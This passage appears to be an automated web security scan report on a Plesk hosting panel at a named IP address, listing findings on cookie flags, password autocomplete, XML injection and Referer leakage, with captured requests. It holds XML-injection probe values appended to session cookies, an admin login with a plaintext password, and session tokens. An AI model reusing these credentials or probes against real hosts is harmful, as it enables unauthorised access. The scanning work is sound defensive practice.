Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 03:09:20 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:09:24 GMT
Connection: close
Content-Length: 23778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.12. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/edit/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/edit/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:07:57 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:09 GMT
Connection: close
Content-Length: 37611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.13. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/permissions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/permissions/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:07:14 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:26 GMT
Connection: close
Content-Length: 16715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.14. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/rename/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/rename/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:07:14 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:42 GMT
Connection: close
Content-Length: 39552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.15. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/view/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/view/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:08:05 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:13 GMT
Connection: close
Content-Length: 35943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.16. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/function.require  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/view/function.require

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/view/function.require HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/?cmd=show&file=request-uri_too_long.html
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:12:26 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:12:27 GMT
Connection: close
Content-Length: 16060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.17. http://174.122.23.218:8880/plesk/dashboard/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/dashboard/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/dashboard/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:07:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:02 GMT
Connection: close
Content-Length: 16371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

4.18. http://174.122.23.218:8880/smb/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /smb/login HTTP/1.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-prototype-version: 1.6.1_rc3
Referer: http://174.122.23.218:8880/smb/login?returnUrl=%2Fuser%2Flist
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645
Content-Length: 164

loginSection%5Busername%5D=admin&loginSection%5Bpassword%5D=Nose1Dive&loginSection%5BrememberMe%5D=0&loginSection%5BrememberMe%5D=1&returnUrl=%2Fuser%2Flist&force=0

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
Set-Cookie: user=54a8ad2443247fe6e4900290dc4e0cf8; expires=Tue, 09-Nov-2010 01:03:54 GMT
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:03:54 GMT
Connection: close
Content-Length: 66

{"redirect":"\/user\/list","status":"success","statusMessages":[]}

5. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://174.122.23.218:8880/smb/user/create/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/user/create/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /smb/user/create/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:06:44 GMT
Connection: close
Content-Length: 19843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<div id="main">
<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">

<div id='general-vcard' class='form-box' >
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

5.2. http://174.122.23.218:8880/smb/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /smb/login?returnUrl=%2Fuser%2Flist HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:03:01 GMT
Connection: close
Content-Length: 8558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<div id="main">
<form id="form-login" enctype="application/x-www-form-urlencoded" action="login" method="post">

<div id='loginSection' class='form-box' >
...[SNIP]...
<div class='field-value'>

<input type="password" name="loginSection[password]" id="loginSection-password" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

5.3. http://174.122.23.218:8880/smb/my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/my-profile

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /smb/my-profile HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/user/list
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:06 GMT
Connection: close
Content-Length: 25218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='tab-buttons-form-user' class='tabs'>
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

6. XML injection  previous  next
There are 2 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


6.1. http://174.122.23.218:8880/javascript/chk.js.php [PHPSESSID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /javascript/chk.js.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the PHPSESSID cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascript/chk.js.php?plesk_version=psa-10.2.0-20100707.19 HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645]]>>; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:42:45 GMT
Connection: close
Content-Length: 84814

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SPN_AUTOINSTALLER_COMPONENTS_XML already defined in <b>
...[SNIP]...

6.2. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/ [PLESKSESSID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The PLESKSESSID cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the PLESKSESSID cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /plesk/client@1/domain@1/hosting/file-manager/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645]]>>; locale=en-US; SessionID=42b54cb11fc3aedbd

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:34:15 GMT
Connection: close
Content-Length: 85847

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
</b>: Constant SPN_AUTOINSTALLER_COMPONENTS_XML already defined in <b>
...[SNIP]...

7. Cross-domain Referer leakage  previous  next
There are 21 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2F HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2F%255ebaseline
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:24:48 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:24:48 GMT
Connection: close
Content-Length: 55746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/%5ebaseline" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/baseline" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/sitebuilder" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/favicon.ico" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/header.js" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
